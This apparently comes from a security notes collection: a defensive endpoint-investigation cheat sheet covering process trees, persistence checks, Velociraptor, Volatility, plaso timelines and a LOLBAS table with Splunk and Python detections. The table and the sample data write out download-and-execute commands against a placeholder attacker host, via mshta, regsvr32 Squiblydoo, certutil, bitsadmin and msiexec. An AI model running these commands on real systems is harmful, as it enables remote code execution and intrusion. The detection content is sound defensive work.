
Endpoint investigation — EDR & Artefacts

Analyse endpoint artefacts: processes, persistence, memory, timeline

snippet · advanced · 2025-05-13 · 5 min read
Tags: soc, endpoint, EDR, process, persistence, memory, DFIR

Suspicious process trees

| Pattern | Meaning | ATT&CK |
|---|---|---|
| WINWORD.EXE → powershell.exe | Malicious Office macro | T1566.001, T1059.001 |
| EXCEL.EXE → cmd.exe → net.exe | Macro downloading a payload | T1059.003 |
| outlook.exe → wscript.exe | Malicious script attachment | T1566.001 |
| explorer.exe → cmd.exe → net.exe | Manual execution by an attacker | T1059.003 |
| lsass.exe → [any child] | Injection into lsass (very rarely legitimate) | T1055 |
| svchost.exe → powershell.exe | Malicious service or WMI execution | T1047, T1059.001 |
| msiexec.exe → rundll32.exe → regsvr32.exe | LOLBAS chain | T1218 |
| wscript.exe → powershell.exe -enc | VBS dropper script | T1059.005 |
| regsvr32.exe /s /u /i:http://... | Squiblydoo bypass | T1218.010 |


Process investigation commands

Windows

```powershell
# Variables to fill in: {{SUSPICIOUS_DLL}}
# Process list with path and hash (processes without a readable path are skipped)
Get-Process | Where-Object Path | Select-Object Name, Id, Path, @{
    N = 'Hash'; E = { (Get-FileHash $_.Path -ErrorAction SilentlyContinue).Hash }
} | Format-Table -AutoSize
# Processes with active network connections, resolved to name and binary path
Get-NetTCPConnection -State Established | ForEach-Object {
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        LocalAddr  = $_.LocalAddress
        LocalPort  = $_.LocalPort
        RemoteAddr = $_.RemoteAddress
        RemotePort = $_.RemotePort
        PID        = $_.OwningProcess
        Process    = $proc.Name
        Path       = $proc.Path
    }
} | Format-Table -AutoSize
# Full process tree (parent/child relationships via ParentProcessId)
Get-CimInstance Win32_Process | Select-Object ProcessId, ParentProcessId, Name, CommandLine |
    Sort-Object ParentProcessId | Format-Table -AutoSize
# Injected processes: look for an unusual module loaded in running processes
tasklist /m /fi "STATUS eq running" | findstr /i "{{SUSPICIOUS_DLL}}"
```

```cmd
REM Quick command-line triage; outputs are written to c:\temp
tasklist /v /fo csv > c:\temp\tasklist.csv
wmic process get ProcessId,ParentProcessId,Name,CommandLine /format:csv > c:\temp\processes.csv
netstat -nao > c:\temp\netstat.txt
```
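The parent/child patterns from the process-tree table can be applied automatically to a `processes.csv` export like the one the cmd block above produces. The Python script below is an added example, not part of the original playbook: it parses a constructed sample in the `wmic /format:csv` column layout, walks the tree by ParentProcessId, and flags the table's parent→child pairs, any child of lsass.exe, and a regsvr32 Squiblydoo command line; the sample rows and the `198.51.100.7` address are made up.

```python
import csv
import re
# Suspicious parent -> child pairs from the process-tree table, with their ATT&CK ids.
SUSPICIOUS_PAIRS = {
    ("winword.exe", "powershell.exe"): ("Malicious Office macro", "T1566.001, T1059.001"),
    ("excel.exe", "cmd.exe"): ("Macro downloading a payload", "T1059.003"),
    ("outlook.exe", "wscript.exe"): ("Malicious script attachment", "T1566.001"),
    ("svchost.exe", "powershell.exe"): ("Malicious service or WMI exec", "T1047, T1059.001"),
    ("wscript.exe", "powershell.exe"): ("VBS dropper script", "T1059.005"),
}
# Squiblydoo: regsvr32 pointed at a scriptlet over HTTP(S) (T1218.010).
SQUIBLYDOO = re.compile(r"regsvr32(\.exe)?\s.*/i:https?://", re.IGNORECASE)
# Constructed sample in the column layout `wmic ... /format:csv` emits
# (columns alphabetical, Node first). Not data from a real host.
SAMPLE_CSV = r"""Node,CommandLine,Name,ParentProcessId,ProcessId
HOST01,C:\Windows\explorer.exe,explorer.exe,500,1000
HOST01,C:\Windows\System32\lsass.exe,lsass.exe,600,700
HOST01,C:\Windows\System32\svchost.exe -k netsvcs,svchost.exe,600,800
HOST01,WINWORD.EXE /n invoice.docm,WINWORD.EXE,1000,2000
HOST01,powershell.exe -nop -w hidden -enc QUFBQQ==,powershell.exe,2000,2100
HOST01,regsvr32 /s /u /i:http://198.51.100.7/a.sct scrobj.dll,regsvr32.exe,1000,2200
HOST01,cmd.exe /c whoami,cmd.exe,700,2300
"""

def load_processes(csv_text):
    """Parse wmic CSV text into {pid: (lower-cased name, ppid, command line)}."""
    procs = {}
    for row in csv.DictReader(csv_text.strip().splitlines()):
        procs[int(row["ProcessId"])] = (
            row["Name"].lower(), int(row["ParentProcessId"]), row["CommandLine"] or "")
    return procs

def find_suspicious(procs):
    """Return one (pid, parent_name, child_name, reason, technique) tuple per hit."""
    hits = []
    for pid, (name, ppid, cmdline) in sorted(procs.items()):
        parent = procs.get(ppid)
        pname = parent[0] if parent else "<unknown>"
        if pname == "lsass.exe":  # any child of lsass is abnormal (T1055)
            hits.append((pid, pname, name, "Child spawned by lsass.exe", "T1055"))
        elif (pname, name) in SUSPICIOUS_PAIRS:
            reason, technique = SUSPICIOUS_PAIRS[(pname, name)]
            hits.append((pid, pname, name, reason, technique))
        if SQUIBLYDOO.search(cmdline):
            hits.append((pid, pname, name, "Squiblydoo: remote scriptlet via regsvr32", "T1218.010"))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(load_processes(SAMPLE_CSV)):
        print("PID %d: %s -> %s | %s [%s]" % hit)
```

A redirected `wmic` export on a real host is UTF-16LE with a leading blank line, so read it with `encoding="utf-16"` before handing the text to `load_processes`.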

Linux

```bash
# Variables to fill in: {{PID}}
# Suspicious processes: parent/child tree, sorted by CPU usage
ps auxf --sort=-%cpu | head -40
# Processes with network sockets, resolved to their executable
ss -tulnp | awk '{print $NF}' | grep -oP 'pid=\K[0-9]+' | sort -u |
    xargs -I{} sh -c 'echo "PID: {}"; ls -la /proc/{}/exe 2>/dev/null'
# Processes whose binary is no longer on disk (fileless / deleted executable)
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
    exe=$(readlink /proc/$pid/exe 2>/dev/null)
    if echo "$exe" | grep -q "(deleted)"; then
        echo "DELETED: PID=$pid EXE=$exe CMD=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')"
    fi
done
# Files opened by a suspicious process (regular files and directories filtered out)
lsof -p {{PID}} 2>/dev/null | grep -v "REG\|DIR" | head -30
```

Checklist — Persistence

```powershell
# Persistence audit: Run / RunOnce keys
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
# WMI event subscriptions: advanced persistence (T1546.003)
Get-CimInstance -Namespace root/subscription -ClassName __EventFilter
Get-CimInstance -Namespace root/subscription -ClassName __EventConsumer
Get-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding
# Scheduled tasks: full action content, keeping only script / LOLBAS interpreters
Get-ScheduledTask | Where-Object State -ne "Disabled" |
    ForEach-Object { $_.Actions } | Select-Object Execute, Arguments |
    Where-Object { $_.Execute -match "powershell|cmd|wscript|mshta|regsvr" }
```

Velociraptor / EDR — Artefact collection

```sql
// Velociraptor: VQL queries for endpoint investigation.
// Process list filtered on command lines carrying encoding/download indicators.
SELECT *
FROM Artifact.Windows.System.Pslist()
WHERE CommandLine =~ "(?i)(base64|enc|http|Download)"
// Collect all persistence artefacts
SELECT * FROM Artifact.Windows.Persistence.PermanentWMIEvents()
SELECT * FROM Artifact.Windows.System.ScheduledTasks()
SELECT * FROM Artifact.Windows.Registry.RunKeys()
```

```bash
# Variables to fill in: {{FALCON_TOKEN}}, {{DEVICE_ID}}
# EDR CLI: isolate (network-contain) a host, CrowdStrike Falcon API example
curl -X POST "https://api.crowdstrike.com/devices/entities/devices-actions/v2?action_name=contain" \
    -H "Authorization: Bearer {{FALCON_TOKEN}}" \
    -H "Content-Type: application/json" \
    -d '{"ids": ["{{DEVICE_ID}}"]}'
```

Memory forensics — Volatility 3

```bash
# Variables to fill in: {{PID}}
# Volatility 3: installation and basic usage
pip install volatility3
# Memory image: process list
vol.py -f memory.dmp windows.pslist
# Process tree
vol.py -f memory.dmp windows.pstree
# Network connections recovered from memory
vol.py -f memory.dmp windows.netscan
# Injected code detection (MZ headers in regions not backed by an image file)
vol.py -f memory.dmp windows.malfind --pid {{PID}}
# DLLs loaded by a process
vol.py -f memory.dmp windows.dlllist --pid {{PID}}
# Dump the memory regions of a suspicious process
vol.py -f memory.dmp windows.memmap --pid {{PID}} --dump
# Open handles of a process
vol.py -f memory.dmp windows.handles --pid {{PID}}
# Strings in a process's memory: windows.strings maps the output of `strings` (with decimal offsets) to processes
strings -a -t d memory.dmp > strings.txt
vol.py -f memory.dmp windows.strings --strings-file strings.txt --pid {{PID}} | grep -iE "(http|cmd|powershell|VirtualAlloc)"
```

Timeline — plaso / log2timeline

```bash
# Variables to fill in: {{START_DATE}}, {{END_DATE}}
# Build a full timeline of a Windows system from a disk image (win7 preset plus registry parser)
log2timeline.py --parsers "win7,winreg" \
    --storage-file /output/timeline.plaso \
    /mnt/evidence/image.dd
# Filter on a date range and export to CSV (l2tcsv format)
psort.py -o l2tcsv \
    -w /output/timeline.csv \
    /output/timeline.plaso \
    "date > '{{START_DATE}}' and date < '{{END_DATE}}'"
# Quick search for suspicious events
grep -i "powershell\|psexec\|mimikatz\|lsass" /output/timeline.csv | head -50
```

LOLBAS — Abuse detection

| Binary | Abuse technique | Suspicious command | ATT&CK |
|---|---|---|---|
| mshta.exe | HTA/VBS execution | mshta http://{{LHOST}}/evil.hta | T1218.005 |
| regsvr32.exe | Squiblydoo — remote DLL | regsvr32 /s /u /i:http://{{LHOST}}/evil.sct scrobj.dll | T1218.010 |
| certutil.exe | Payload download | certutil -urlcache -split -f http://{{LHOST}}/payload.exe | T1105 |
| bitsadmin.exe | Persistent download | bitsadmin /transfer job http://{{LHOST}}/evil.exe c:\tmp\evil.exe | T1197 |
| wscript.exe | Script execution | wscript //e:VBScript //b evil.js | T1059.005 |
| rundll32.exe | DLL execution | rundll32 \\{{LHOST}}\share\evil.dll,DllMain | T1218.011 |
| msiexec.exe | Remote MSI install | msiexec /q /i http://{{LHOST}}/evil.msi | T1218.007 |
| odbcconf.exe | Execution proxy | odbcconf /s /a {REGSVR evil.dll} | T1218.008 |

Splunk: LOLBAS detection on process-creation events (4688) whose arguments reference a network location, last 24 hours.

```splunk
index=windows EventCode=4688 earliest=-24h
(NewProcessName="*certutil*" AND CommandLine="*http*")
OR (NewProcessName="*mshta*" AND (CommandLine="*http*" OR CommandLine="*\\\\*"))
OR (NewProcessName="*regsvr32*" AND CommandLine="*scrobj*")
OR (NewProcessName="*bitsadmin*" AND CommandLine="*transfer*")
OR (NewProcessName="*rundll32*" AND CommandLine="*\\\\*")
| table _time, host, SubjectUserName, NewProcessName, CommandLine
| sort _time
```

💡 Tip — Check the integrity level of the parent process: a "Medium Integrity" child spawned by a "High Integrity" process is normal during an elevation, but the reverse (a High child from a Medium parent with no visible UAC prompt) is a marker of non-standard privilege escalation to investigate immediately.
OPS·BRAIN v1.075 notes · Securitylocal